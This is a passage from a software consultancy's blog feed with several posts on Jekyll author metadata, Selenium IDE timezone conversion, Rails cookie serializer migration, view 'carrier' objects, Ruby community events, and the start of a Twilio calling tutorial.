  twitter: neerajsingh0101</code></pre><p>We do not need to do anything to load <strong>authors.yml</strong>. It is automatically loaded by Jekyll.</p><p>When we create a blog, the top of the blog looks like this.</p><pre><code class="language-plaintext">---
layout: post
title: How to deploy jekyll site to heroku
categories: [Ruby]
author_github: neerajsingh0101
---</code></pre><p>Notice the last line where we have put in the author's github id.
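</p><p>What Jekyll does with that id can be sketched in plain Ruby: <code>site.data.authors</code> is simply the parsed <strong>authors.yml</strong>, indexed by the id from the front matter. This is only an illustration of the data lookup, not Jekyll's actual code.</p>

```ruby
require 'yaml'

# A fragment of authors.yml, inlined for a self-contained illustration.
authors_yml = <<~YAML
  neerajsingh0101:
    name: Neeraj Singh
    avatar: http://bigbinary.com/assets/team/neeraj.jpg
    github: neerajsingh0101
    twitter: neerajsingh0101
YAML

authors = YAML.safe_load(authors_yml) # what Jekyll exposes as site.data.authors
author_github = "neerajsingh0101"     # what the post's front matter supplies

author = authors[author_github]
author["name"] # => "Neeraj Singh"
```

<p>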
That's the identifier we use to pull in the author's information.</p><p>In order to display the author's name we have the following code in the layout.</p><pre><code class="language-plaintext">{% raw %}&lt;span class=&quot;author-name&quot;&gt;
  {{ site.data.authors[page.author_github].name }}
&lt;/span&gt;{% endraw %}</code></pre><p>Similarly, to display the author's twitter handle and github id we have the following code.</p><pre><code class="language-plaintext">{% raw %}&lt;a href=&quot;https://www.twitter.com/{{site.data.authors[page.author_github].twitter}}&quot;&gt;
  &lt;i class=&quot;ico-twitter&quot;&gt;&lt;/i&gt;
&lt;/a&gt;
&lt;a href=&quot;https://www.github.com/{{site.data.authors[page.author_github].github}}&quot;&gt;
  &lt;i class=&quot;ico-github&quot;&gt;&lt;/i&gt;
&lt;/a&gt;{% endraw %}</code></pre><p>Now the blog will display the author information, and all of it is nicely centralized in one single file.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Obtain current timezone in Selenium IDE using JS]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript"/>
      <updated>2015-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript</id>
      <content type="html"><![CDATA[<p>I had encountered a problem in one of our projects where it was required to obtain the current time from a different timezone and then use it. I am in IST (Indian Standard Time, UTC+5:30) and was required to get the time in EST (Eastern Standard Time, UTC-5:00).</p><p>These are the set of commands I used to achieve that.</p><pre><code class="language-javascript">Command : storeEval
Target  : var d = new Date();
          d.setTime(new Date( (d.getTime() + (d.getTimezoneOffset() * 60000))
            + (3600000 * (-5) ) ));
          d.toLocaleTimeString();
Value   : timeEst

Command : echo
Target  : ${timeEst}
Value   :</code></pre><p>The <strong><code>storeEval</code></strong> command is used to store the value in the variable <code>timeEst</code> after evaluating the JavaScript code.</p><p><strong><code>var d = new Date();</code></strong> creates a new date object.</p><p>The <strong><code>d.getTime()</code></strong> method returns the number of <em>milliseconds</em> between midnight of January 1, 1970 and the specified date (as is present in the variable &quot;d&quot;).</p><p>The <strong><code>d.getTimezoneOffset()</code></strong> method returns the time difference between UTC (Coordinated Universal Time) and the local time of the variable &quot;d&quot;, in <em>minutes</em>. For example, if our time zone is GMT+5:30, -330 will be returned.</p><p>Since <code>getTime()</code> is in milliseconds and <code>getTimezoneOffset()</code> is in minutes, <code>getTimezoneOffset()</code> is multiplied by 60000 to convert it into milliseconds.</p><p>The expression <strong><code>3600000 * (-5)</code></strong> is required to shift the time from UTC to EST. The difference between UTC and EST is -5 hours.
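</p><p>The conversion can be sanity-checked in plain Ruby rather than Selenium's JavaScript; the timestamp below is arbitrary and the -5 hour shift is the same one used above:</p>

```ruby
MS_PER_HOUR = 3_600_000 # 60 min x 60 sec x 1000 ms

utc = Time.utc(2015, 1, 8, 12, 0, 0)            # 12:00 UTC
est_ms = (utc.to_i * 1000) + (MS_PER_HOUR * -5) # shift by -5 hours
est = Time.at(est_ms / 1000).utc

est.hour # => 7, i.e. 12:00 UTC is 07:00 EST
```

<p>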
So, to convert the hours to milliseconds we need to multiply by 3600000 (60 min x 60 sec x 1000 millisec).</p><p>The <strong><code>d.setTime()</code></strong> method is used to set the time of variable &quot;d&quot; after evaluating the expression.</p><p>With the above, the variable &quot;d&quot; is set with the EST date and time.</p><p>The <strong><code>d.toLocaleTimeString()</code></strong> method returns the time portion of a Date object as a string, using locale conventions.</p><p>The time string obtained above is stored in the variable <code>timeEst</code>.</p><p>With <strong><code>echo ${timeEst}</code></strong>, the time string is displayed in the console.</p><hr><p><strong><code>Using EST time</code></strong></p><p><img src="/blog_images/2015/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript/selenium_javascript_time.jpg" alt="Selenium javascript EST time"></p><hr><p><strong><code>Using EST date</code></strong></p><p><img src="/blog_images/2015/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript/selenium_javascript_date.jpg" alt="Selenium javascript EST date"></p><hr>]]></content>
    </entry><entry>
       <title><![CDATA[2014 - Year in Community Engagement]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/2014-year-in-community-engagement"/>
      <updated>2015-01-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/2014-year-in-community-engagement</id>
      <content type="html"><![CDATA[<p>At BigBinary our team loves to engage with the community as well as help out in different ways. We love contributing to <a href="https://bigbinary.com/open-source">OpenSource</a>, <a href="https://bigbinary.com/presentations">speaking at and attending different conferences</a>, and helping out in community meetups, <a href="deccanrubyconf">organizing conferences</a>, and events like <a href="rails-girls-pune-2014">RailsGirls</a>.</p><h2>Short summary</h2><p>In the year 2014 we presented at the following 8 conferences across 6 countries.</p><ul><li>RubyConf Goa, India</li><li>RubyConf Philippines</li><li>RedDotRubyConf Singapore</li><li>DeccanRubyConf Pune, India</li><li>Madison+Ruby Wisconsin, USA</li><li>RubyConf Brazil</li><li>RubyKaigi Tokyo, Japan</li><li>Golden Gate Ruby Conference San Francisco, USA</li></ul><h2>Rails and Ruby Conferences</h2><p>&lt;iframe style=&quot;min-height: 500px; width: 100%;&quot; src=&quot;https://www.mapquest.com/embed?hk=1x7D17Q&quot; marginwidth=&quot;0&quot; marginheight=&quot;0&quot; frameborder=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/iframe&gt;</p><p>At the start of our travel, we visited <a href="http://rubyconfindia.org">RubyConf India 2014</a>. The conference took place at an amazing beach resort in Goa. The two days of the conference were full of fun and interactions with the best Ruby people around India. During the conference our team announced the launch of <a href="http://www.rubyindia.org/">Ruby India</a> to help spread ideas and experiments from the Indian Ruby community, as well as highlight content from people.</p><p>Soon after, I visited the Philippines to conduct a workshop on &quot;Contributing to Rails&quot; at <a href="http://rubyconf.ph">RubyConf Philippines</a>. It was amazing to meet the growing Philippines community.
I was happy to spend time with some amazing Rubyists, like <a href="https://twitter.com/apotonick">Nick Sutterer</a>, <a href="https://twitter.com/_zzak">Zachary Scott</a>, <a href="https://twitter.com/konstantinhaase">Konstantin Haase</a>, <a href="https://twitter.com/_ko1">Koichi Sasada-san</a>, <a href="https://twitter.com/aspleenic">PJ Hagerty</a>, <a href="https://twitter.com/indirect">Andre Arko</a> and many more.</p><p>After that Prathamesh and I went to Singapore to speak at <a href="http://reddotrubyconf.com">RedDotRubyConf</a>. We spoke on Arel and ActiveRecord. RedDotRubyConf was our first joint talk together at a conference. Again we met a lot of awesome people like <a href="https://twitter.com/_solnic_">Piotr Solnica</a>, <a href="https://twitter.com/arnvald">Grzegorz Witek</a>, <a href="https://twitter.com/yinquanteo">Yinquan Teo</a>, <a href="https://twitter.com/sayanee_">Sayanee Basu</a>, <a href="https://twitter.com/ntt">Chinmay Pendharkar</a> and <a href="https://twitter.com/winstonyw">Winston Teo Yong Wei</a>. We also visited Marina Bay Sands and Sentosa Island.</p><p>Back in Pune, we hosted the first ever <a href="http://www.deccanrubyconf.org/">DeccanRubyConf</a>. Our team was busy working on tasks right from building the website, inviting speakers, planning, and other arrangements. The conference had good talks and some really useful workshops. It was a fun one-day conference, with an attendance of over 170 people.</p><p>The conference also saw our team announce the launch of the RubyIndia Podcast, which does regular interviews with notable people from the Ruby community and the Indian community.</p><p><a href="https://bigbinary.com/team">Prathamesh</a> and I then left on a roughly one-and-a-half-month trip to attend and speak at multiple conferences.</p><p>We started with <a href="http://madisonpl.us/">Madison+Ruby</a>, in Madison, WI. After several missed flights and a storm, we arrived at our first US conference after 48 hours of travel.
Madison+Ruby was a conference like no other. Several topics touched the humane side of Ruby and the community. We spoke on building our own ORM using Arel. Set in the cultural town of Madison, we immensely enjoyed the cheese curds, farmers markets and game night arranged by the conference team. A huge thanks to <a href="https://twitter.com/jremsikjr">Jim</a> and <a href="https://twitter.com/JenRemsik">Jennifer Remsik</a> for hosting such an amazing event. Thanks also to <a href="https://twitter.com/ruttencutter">Scott Ruttencutter</a> for giving us space to work from his office and giving us a tour of the state capital.</p><p>We then visited Sao Paulo, Brazil for <a href="http://rubyconf.com.br">RubyConf Brazil</a> and presented a talk on building an ORM using Arel. It was a pleasure to meet <a href="https://twitter.com/AkitaOnRails">Fabio Akita</a> and the CodeMiner team. We made friends with <a href="https://twitter.com/celsovjf">Celso Fernandes</a> and <a href="https://twitter.com/plribeiro3000">Paulo</a>, who were kind enough to help us around, since Portuguese is primarily spoken in Brazil. We also met <a href="https://twitter.com/rafaelfranca">Rafael Franca</a> and <a href="https://twitter.com/cantoniodasilva">Carlos Antonio da Silva</a>, who have helped us a lot with the Rails issue tracker.</p><p>Next, Prathamesh headed to <a href="http://rubykaigi.org">RubyKaigi</a>, held in Tokyo, Japan. He presented on <a href="tricks-and-tips-for-using-fixtures-in-rails">Fixtures in Rails</a>. He met Matz, the creator of Ruby, on his first day in Japan. Almost all the core Ruby contributors attended RubyKaigi.
He got to interact with Koichi Sasada-san, <a href="https://twitter.com/1337807">Jonan Scheffler</a>, <a href="https://twitter.com/a_matsuda">Akira Matsuda</a>, <a href="https://twitter.com/chancancode">Godfrey Chan</a>, <a href="https://twitter.com/schneems">Richard Schneeman</a> and a lot of other awesome Rubyists. He also met JRuby core team member <a href="https://twitter.com/tom_enebo">Tom Enebo</a> for the first time. Thanks to <a href="https://twitter.com/yahonda">Yasuo Honda</a> and <a href="https://twitter.com/mreinsch">Michael Reinsch</a> for helping with Japanese food.</p><p>From Brazil, I first visited Miami, and was happy to visit <a href="http://thelabmiami.com/">The Lab Miami</a> and <a href="http://wyncode.co/">WynCode</a> and interact with Rubyists from Miami.</p><p>Before heading to San Francisco for GoGaRuCo, I was able to make a quick stop in Boston and visit <a href="http://www.alterconf.com/sessions/boston-ma">AlterConf Boston</a>. The theme of the conference was diversity in the tech and gaming industries.</p><p>My latest conference was in the amazing city of San Francisco. I presented about building an ORM at <a href="http://gogaruco.com">GoGaRuCo</a>, which incidentally was the last ever GoGaRuCo. The conference saw an amazing turnout. I was able to interact with <a href="https://twitter.com/ultrasaurus">Sarah Allen</a>, <a href="https://twitter.com/wycats">Yehuda Katz</a>, <a href="https://twitter.com/pat">Pat Allen</a>, <a href="https://twitter.com/sarahmei">Sarah Mei</a> and <a href="https://twitter.com/the_zenspider">Ryan Davis</a>.
I spent most of the time with <a href="https://twitter.com/sleeplessgeek">Nathan Long</a>, <a href="https://twitter.com/randycoulman">Randy Coulman</a>, and Nathan's friend <a href="http://sorryrobot.com/">Michael Gundlach</a>, who is the creator of the popular plugin <a href="https://getadblock.com">AdBlock</a>. I also ran into <a href="https://twitter.com/chriseppstein">Chris Eppstein</a>, creator of <a href="http://compass-style.org">Compass</a>. All in all, it was one of the most amazing sets of interactions I have had at a conference.</p><p>2014 was an amazing year for our team. Together we presented at or were part of 8 conferences, launched the RubyIndia Newsletter as well as the RubyIndia Podcast, started 6 new video series on topics from <a href="https://www.bigbinary.com/videos/learn-reactjs-in-steps">ReactJS</a> to <a href="https://www.bigbinary.com/videos/learn-rubymotion">Rubymotion</a> to <a href="https://www.bigbinary.com/videos/learn-selenium">Selenium</a>, published <a href="/blog">numerous blogs</a>, and contributed to a number of OpenSource projects.</p><p>2015 starts with our team presenting at <a href="http://gardencityruby.org">GardenCity Ruby Conf</a>. We hope to get more such chances to interact with and help out the community. Onwards to a new year!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating existing session cookies while upgrading]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above"/>
      <updated>2014-12-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above</id>
      <content type="html"><![CDATA[<p>Rails 4.1 introduced <a href="https://github.com/rails/rails/pull/13692">JSON</a> <a href="https://github.com/rails/rails/pull/13945">serialization</a> for cookies. Earlier all the cookies were serialized using the Marshal library of Ruby. The marshalling of cookies can be <a href="http://matt.aimonetti.net/posts/2013/11/30/sharing-rails-sessions-with-non-ruby-apps/">unsafe</a> because of the possibility of a remote code execution vulnerability. So the change to <code>:json</code> is welcome.</p><p>New applications created with Rails 4.1 or 4.2 have <code>:json</code> as the default cookies serializer.</p><p><code>rake rails:update</code>, used for upgrading existing Rails apps to new versions, rightly changes the serializer to <code>:json</code>.</p><pre><code class="language-ruby">Rails.application.config.action_dispatch.cookies_serializer = :json</code></pre><h2>Deserialization error</h2><p>However, that change can introduce an issue in the application.</p><p>Consider a scenario where the cookies are being used for session storage.
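</p><p>Before continuing with the scenario, it helps to see what the two serializers actually emit, along with the &quot;try JSON first, fall back to Marshal&quot; idea behind the <code>hybrid</code> serializer discussed below. This is a standalone sketch in plain Ruby, not Rails' internals:</p>

```ruby
require 'json'

old_cookie = Marshal.dump(42)  # what a pre-4.1 app wrote (a binary string)
new_cookie = JSON.generate(42) # what a 4.1+ app writes, i.e. "42"

# Illustrative hybrid-style loader (NOT Rails' implementation):
# try JSON first, and fall back to Marshal for old cookies.
def hybrid_load(raw)
  JSON.parse(raw)
rescue JSON::ParserError
  Marshal.load(raw)
end

hybrid_load(old_cookie) # => 42
hybrid_load(new_cookie) # => 42
```

<p>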
Like many normal Rails apps, the <code>current_user_id</code> is being stored in the session.</p><pre><code class="language-ruby">session[:user_id] = current_user_id</code></pre><p>Before Rails 4.1 the cookie will be handled by the Marshal serializer.</p><pre><code class="language-ruby">cookie = Marshal.dump(current_user_id) # 42 =&gt; &quot;\x04\bi/&quot;
Marshal.load(cookie) # &quot;\x04\bi/&quot; =&gt; 42</code></pre><p>After the upgrade the application will try to deserialize cookies using <code>JSON</code> which were serialized using <code>Marshal</code>.</p><pre><code class="language-ruby">JSON.parse cookie # Earlier dumped using Marshal
# JSON::ParserError: 757: unexpected token at 'i/'</code></pre><p>So the deserialization of the existing cookies will fail and users will start getting errors.</p><h2>Hybrid comes to the rescue</h2><p>To prevent this, Rails provides a <code>hybrid</code> serializer. The <code>hybrid</code> serializer deserializes marshalled cookies and stores them in JSON format for the next use. All the new cookies will be serialized in the JSON format. This gives a happy path for migrating existing marshalled cookies to newer Rails versions like 4.1 and 4.2.</p><p>To use this hybrid serializer, set the cookies_serializer config to <code>:hybrid</code> as follows:</p><pre><code class="language-ruby">Rails.application.config.action_dispatch.cookies_serializer = :hybrid</code></pre><p>After this, all the existing marshalled cookies will be migrated to the <code>:json</code> format properly, and in a future upgrade of Rails you can safely change the config from <code>:hybrid</code> to <code>:json</code>, which is the default and safe value of this config.</p><p>Since this blog was published Rails has changed a bit. You might run into a few gotchas. Dylan has written about <a href="https://dylansreile.medium.com/gotchas-with-rails-hybrid-cookie-serialization-841612ebea80">how to handle those gotchas here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Girls Pune 2014]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-girls-pune-2014"/>
      <updated>2014-12-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-girls-pune-2014</id>
      <content type="html"><![CDATA[<p>The second edition of the <a href="http://railsgirls.com/pune">RailsGirls Pune</a> event was an amazing day spent with some equally amazing folks. The event took place on the 13th of December and it saw a huge turnout of around 150+ women from various colleges and companies. It was a free event for beginners interested in learning about coding and building applications using Ruby on Rails.</p><p>BigBinary was happy to be one of the sponsors of the event.</p><p>The event was organized by Rajashree Malvade, Shifa Khan, Pooja Salpekar, Dominika Stempniewicz, and Magdalena Sitarek.</p><p>The BigBinary team reached the venue, the ThoughtWorks office, Pune, at about 8.30 AM. Rajashree did the introductions, and Gautam Rege and I did the kick-off. Gautam introduced Ruby, along with how magical Ruby is and the importance of the event. I spent some time explaining how RailsGirls began, as well as <a href="http://www.railsbridge.org">RailsBridge</a> and other similar events.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/kickoff.jpg" alt="RailsGirls pune kick-off"></p><p>Next, all instructors were grouped together. Grouping was done in such a way that advanced instructors were paired with intermediate and beginner instructors.</p><p>The talented folks from ThoughtWorks had created a fun movie explaining the three different tracks - beginner, intermediate and advanced - into which the students were divided.</p><p>Prathamesh, Richa Trivedi and I took one of the advanced track groups. We started off by pairing people to work with their partner and did a health check of everyone's system. Many of the participants in our group had 1-2 years of professional experience in Java, .NET and so forth. This meant they were quite familiar with setting up various things on their machine and that was a great help. We started with the basics of Ruby - variables, loops, blocks, <code>each</code>, methods, classes, etc.
This took about 2 hours and then we started with Rails and MVC.</p><p>Santosh paired with <a href="https://www.linkedin.com/pub/dinesh-kumar/70/595/9a4">Dinesh</a> and participated in the intermediate track with a group of four students. They started with the basics of Ruby and later built a simple blog app using Rails, deploying the apps to Heroku by the end of the day.</p><p>At about 11.30, <a href="https://twitter.com/sidnc86">Siddhant Chothe</a> from TechVision did an inspiring talk about web accessibility, the <a href="https://github.com/techvision/waiable">Waiable</a> gem, and his journey in the Ruby &amp; Rails world.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/turnout.jpg" alt="Siddhant's session"></p><p>Then we did the Bentobox activity. Participants were handed a page listing various aspects of software development like infrastructure, frontend, application, and storage in boxes. We read out technologies like XML, JSON, AJAX, MongoDB, etc., and asked everyone to write these on stickies and place them in the appropriate boxes on the &quot;Bentobox&quot;. This was helpful for the participants to understand which technologies are related to web development and where they are used.</p><p>Then everyone broke out for lunch. Our enthusiastic lot stayed back to avoid the rush, and began with Rails development. We started by explaining basic MVC concepts and how Rails helps as a framework. We started with a simple app, and created a &quot;pages/home&quot; static home page. This helped our group to understand Rails generators, routes, controllers and views. With our first page up and running, we went for lunch.</p><p>After lunch, a session on Origami was conducted by Nima Mankar. It was a good stress buster after the information bombardment of the first session.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/origami.jpg" alt="Origami session"></p><p>Our next objective was to build an app and deploy it to Heroku.
Our group started out to build &quot;The Cat App&quot;! We began by explaining controllers, CRUD operations, parts of a URL, REST, etc. We created a <code>Cat</code> model, and everyone loved the beauty and simplicity of migrations and performing create, update, delete and find using ActiveRecord. We quickly moved on to building the <code>CatsController</code> and CRUD operations on the same. We made sure we did not use scaffolding, so as to explain the underlying magic instead of having scaffolding hide it away.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/group.jpg" alt="Richa with our group"></p><p><img src="/blog_images/2014/rails-girls-pune-2014/group2.jpg" alt="Other part of our group"></p><p>Soon everyone had a functional app, and it was fun to introduce <em>GorbyPuff</em> as the star of our app, whose images were displayed as cat records, which store the name of the image and the URL to an image.</p><p>We then set up the apps on Heroku and were ready for the next part - the showcase. It was amazing to see so many groups complete their apps and come up with fun, interesting and quirky ideas. One student created a <strong>Boyfriend Expense (Kharcha) Management App</strong>.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/expense.jpg" alt="App showcase"></p><p>The day ended on a high note amid high enthusiasm from all the participants. We finished the workshop with a huge cake for everyone.</p><p>Overall, it was a well-organized, fun and enthusiastic day well spent.</p><p>Thanks to <a href="https://twitter.com/Rajashree612">Rajashree</a>, <a href="http://github.com/shifakhan">Shifa</a>, <a href="https://twitter.com/poojasalpekar">Pooja</a>, <a href="http://github.com/dominika">Dominika</a> and <a href="http://github.com/sitarek">Magdalena</a> for organizing such an awesome event. Both Pune editions have seen great interest, and it has left us all looking forward to the next one!</p>]]></content>
    </entry><entry>
       <title><![CDATA[DRYing up Rails Views with View Carriers and Services]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/drying-up-rails-views-with-view-carriers-and-services"/>
      <updated>2014-12-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/drying-up-rails-views-with-view-carriers-and-services</id>
      <content type="html"><![CDATA[<p>Anyone who has done any Rails development knows that views get complicated very fast. Lately we've been experimenting with carriers (also called view services) to clean up views.</p><p>There are many existing solutions to this problem, like the <a href="https://github.com/drapergem/draper">Draper gem</a> or Cells from the <a href="https://github.com/apotonick/trailblazer">Trailblazer architecture</a>.</p><p>We wanted to start with the simplest solution, by making use of plain Ruby objects that take the business logic away from the views.</p><h2>A complex view</h2><p>Consider this user model.</p><pre><code class="language-ruby">class User
  def super_admin?
    self.role == 'super_admin'
  end

  def manager?
    self.role == 'manager'
  end
end</code></pre><p>Here we have a view that displays the appropriate profile link and changes the CSS class based on the role of the user.</p><pre><code class="language-erb">&lt;% if @user.super_admin? %&gt;
  &lt;%= link_to 'All Profiles', profiles_path %&gt;
&lt;% elsif @user.manager? %&gt;
  &lt;%= link_to 'Manager Profile', manager_profile_path %&gt;
&lt;% end %&gt;

&lt;h3 class=&quot;&lt;%= if @user.manager?
                  'hidden'
               elsif @user.super_admin?
                  'active'
               end %&gt;&quot;&gt;
  Hello, &lt;%= @user.name %&gt;
&lt;/h3&gt;</code></pre><h2>Extracting logic to a Rails helper</h2><p>In the above case we can extract the logic from the view to a helper.</p><p>After the extraction the code might look like this.</p><pre><code class="language-ruby"># app/helpers/users_helper.rb
module UsersHelper
  def class_for_user(user)
    if user.manager?
      'hidden'
    elsif user.super_admin?
      'active'
    end
  end
end</code></pre><p>Now the view is much simpler.</p><pre><code class="language-erb">&lt;h3 class=&quot;&lt;%= class_for_user(@user) %&gt;&quot;&gt;
  Hello, &lt;%= @user.name %&gt;
&lt;/h3&gt;</code></pre><h2>Why not use Rails helpers?</h2><p>The above solution works. However, in a large Rails application it will start creating problems.</p><p><code>UsersHelper</code> is a module and it is mixed into <code>ApplicationHelper</code>. So if the Rails project has a large number of helpers then all of them are mixed into the <code>ApplicationHelper</code> and sometimes there is a name collision. For example, let's say that there is another helper called <code>ShowingHelper</code> and this helper also has a method <code>class_for_user</code>. Now <code>ApplicationHelper</code> is mixing in both the <code>UsersHelper</code> and <code>ShowingHelper</code> modules. One of those methods will be overridden and we would not even know about it.</p><p>Another issue is that all the helpers are modules, not classes. Because they are not classes it becomes difficult to refactor helpers later. If a module has five methods and we refactor two of those methods into two separate methods, then we end up with seven methods. Now out of those seven methods in the helper only five of them should be public and the other two should be private. However, since all the helpers are modules, it is very hard to see which of them are public and which of them are private.</p><p>And lastly, writing tests for helpers is possible, but testing a module directly feels weird since most of the time we test a class.</p><h2>Carriers</h2><p>Let's take a look at how we can extract the view logic using carriers.</p><pre><code class="language-ruby">class UserCarrier
  attr_reader :user

  def initialize(user)
    @user = user
  end

  def user_message_style_class
    if user.manager?
      'hidden'
    elsif user.super_admin?
      'active'
    end
  end
end</code></pre><p>In our controller:</p><pre><code class="language-ruby">class UserController &lt; ApplicationController
  def show
    @user = User.find(params[:id])
    @user_carrier = UserCarrier.new @user
  end
end</code></pre><p>Now the view looks like this.</p><pre><code class="language-erb">&lt;% if @user.super_admin? %&gt;
  &lt;%= link_to 'All Profiles', profiles_path %&gt;
&lt;% elsif @user.manager? %&gt;
  &lt;%= link_to 'Manager Profile', manager_profile_path %&gt;
&lt;% end %&gt;

&lt;h3 class=&quot;&lt;%= @user_carrier.user_message_style_class %&gt;&quot;&gt;
  Hello, &lt;%= @user.name %&gt;
&lt;/h3&gt;</code></pre><h3>No HTML markup in the carriers</h3><p>Even though carriers are used for presentation, we stay away from having any HTML markup in our carriers. That is because once we open the door to having HTML markup in our carriers, carriers quickly get complicated and it becomes harder to test them.</p><h3>No link_to in the carriers</h3><p>Since carriers are plain Ruby objects, there is usually no <code>link_to</code> or other helper methods. And we keep carriers that way. We do not do <code>include ActionView::Helpers::UrlHelper</code>, because the job of the carrier is to present the data that can be used in <code>link_to</code> and to complement the usage of <code>link_to</code>.</p><p>We believe that <code>link_to</code> belongs in the ERB file. However, if we really need to have an abstraction over it then we can create a regular Rails helper method. We minimize the usage of Rails helpers; we do not avoid them altogether.</p><h2>Overcoming double dots</h2><p>Many times in our views we end up doing</p><pre><code class="language-erb">Email Preference for Tuesday: &lt;%= @user.email_preferences.tuesday_preference %&gt;</code></pre><p>This is a violation of the <a href="http://en.wikipedia.org/wiki/Law_of_Demeter">Law of Demeter</a>. We call it &quot;don't use double dots&quot;.
Meaning, don't do <code>@article.publisher.full_name</code>.</p><p>It's just a matter of time before view code looks like this:</p><pre><code class="language-erb">  &lt;%= @article.publisher.active.not_overdue.try(:full_name) %&gt;</code></pre><p>Since carriers encapsulate objects into classes, we can overcome this &quot;double dots&quot; issue by delegating behavior to the appropriate object.</p><pre><code class="language-ruby">class UserCarrier
  attr_reader :user, :email_preferences

  delegate :tuesday_preference, to: :email_preferences

  def initialize user
    @user = user
    @email_preferences = user.email_preferences
  end
end</code></pre><p>After that refactoring we end up with cleaner views like this:</p><pre><code class="language-erb">  Email Preference for Tuesday: &lt;%= @user_carrier.tuesday_preference %&gt;</code></pre><p>Note that &quot;double dots&quot; are allowed in other parts of the code. We just do not allow them in views.</p><h2>Testing</h2><p>Since carriers are simple Ruby objects, it's easy to test them.</p><pre><code class="language-ruby">require 'test_helper'

class UserCarrierTest &lt; ActiveSupport::TestCase
  fixtures :users

  def setup
    manager = users(:manager)
    @user_carrier = UserCarrier.new manager
  end

  def test_css_class_returned_for_manager
    assert_equal 'hidden', @user_carrier.user_message_style_class
  end
end</code></pre><h2>Summary</h2><p>Carriers allow us to encapsulate complex business logic in simple Ruby objects.</p><p>This helps us achieve a clearer separation of concerns, clean up our views, and avoid skewed and complex views. Our views are free of &quot;double dots&quot; and we end up with simple tests which are easy to maintain.</p><p>We decided to call it a &quot;carrier&quot; and not &quot;presenter&quot; because the word &quot;presenter&quot; is overloaded and has many meanings.</p><p>We at BigBinary take a similar approach for extracting code from a fat controller or a fat model. 
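</p><p>To recap, the pattern itself needs nothing from Rails. Here is a minimal, self-contained sketch; the <code>Struct</code>-based user is a hypothetical stand-in for the real Active Record model:</p>

```ruby
# Hypothetical stand-in for the Active Record User model.
User = Struct.new(:name, :role) do
  def manager?
    role == :manager
  end

  def super_admin?
    role == :super_admin
  end
end

# The carrier: a plain Ruby object that owns the view logic.
class UserCarrier
  attr_reader :user

  def initialize(user)
    @user = user
  end

  def user_message_style_class
    if user.manager?
      'hidden'
    elsif user.super_admin?
      'active'
    end
  end
end

puts UserCarrier.new(User.new('John', :manager)).user_message_style_class     # prints "hidden"
puts UserCarrier.new(User.new('Jane', :super_admin)).user_message_style_class # prints "active"
```

<p>Because the carrier is a plain Ruby object, this file runs under bare <code>ruby</code>, which is exactly what makes carriers so easy to test. As for extracting code from fat controllers and fat models: 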
You can find out more about it <a href="https://www.bigbinary.com/videos/learn-ruby-on-rails/using-services-to-manage-code">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Make Outbound calls to a phone using Twilio and Rails]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/twilio-rails-calling-from-browser-to-a-phone"/>
      <updated>2014-09-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/twilio-rails-calling-from-browser-to-a-phone</id>
      <content type="html"><![CDATA[<p>In this blog post we will see how to make outbound phone calls from the browser to a phone using <a href="http://twilio.com">Twilio</a>. We will make use of the <a href="https://www.twilio.com/docs/client/twilio-js">Twilio-JS</a> library and the <a href="http://github.com/twilio/twilio-ruby">Twilio-Ruby gem</a>.</p><p>The Rails app we will be creating is based on the Twilio Client <a href="https://www.twilio.com/docs/quickstart/ruby/client">quickstart tutorial</a>. That Twilio tutorial makes use of Sinatra. We will see how we can achieve the same in a Rails application.</p><h2>Step 1 - Setup Twilio Credentials and TwiML App</h2><p>We need to set up Twilio credentials. We can find the account SID and auth token in our <a href="https://www.twilio.com/user/account">account information</a>.</p><p>When the call is made using the browser, the phone that is receiving the call has to see a number from which the call is coming. So we need to set up a Twilio verified number. This number will be used to place the outgoing calls from. How to set up a verified number can be found <a href="https://www.twilio.com/help/faq/voice/how-do-i-add-a-verified-outgoing-caller-id-with-twilio">here</a>.</p><p>When our app makes a call from the browser using the twilio-js client, Twilio first creates a new call connection from our browser to Twilio. It then sends a request back to our server to get information about what to do next. We can respond by asking Twilio to call a number, say something to the person after the call is connected, record the call, etc.</p><p>The sending of these instructions is controlled by setting up a TwiML application. This application provides information about the endpoint on our server where Twilio should send the request to fetch instructions. 
<a href="https://www.twilio.com/docs/api/twiml">TwiML</a> is a set of instructions that we can use to tell Twilio what to do in different cases, like when an outbound phone call is made or when an inbound SMS message is received.</p><p>Given below is an example that will say a short message, <code>How are you today?</code>, in a call.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;Response&gt;
    &lt;Say voice=&quot;woman&quot;&gt;How are you today?&lt;/Say&gt;
&lt;/Response&gt;</code></pre><p>The TwiML app can be created <a href="https://www.twilio.com/user/account/apps">here</a>. Once the app is configured, we will get an <code>appsid</code> (the application SID).</p><p>We need to configure the following information in our Rails application:</p><pre><code class="language-yaml">twilio:
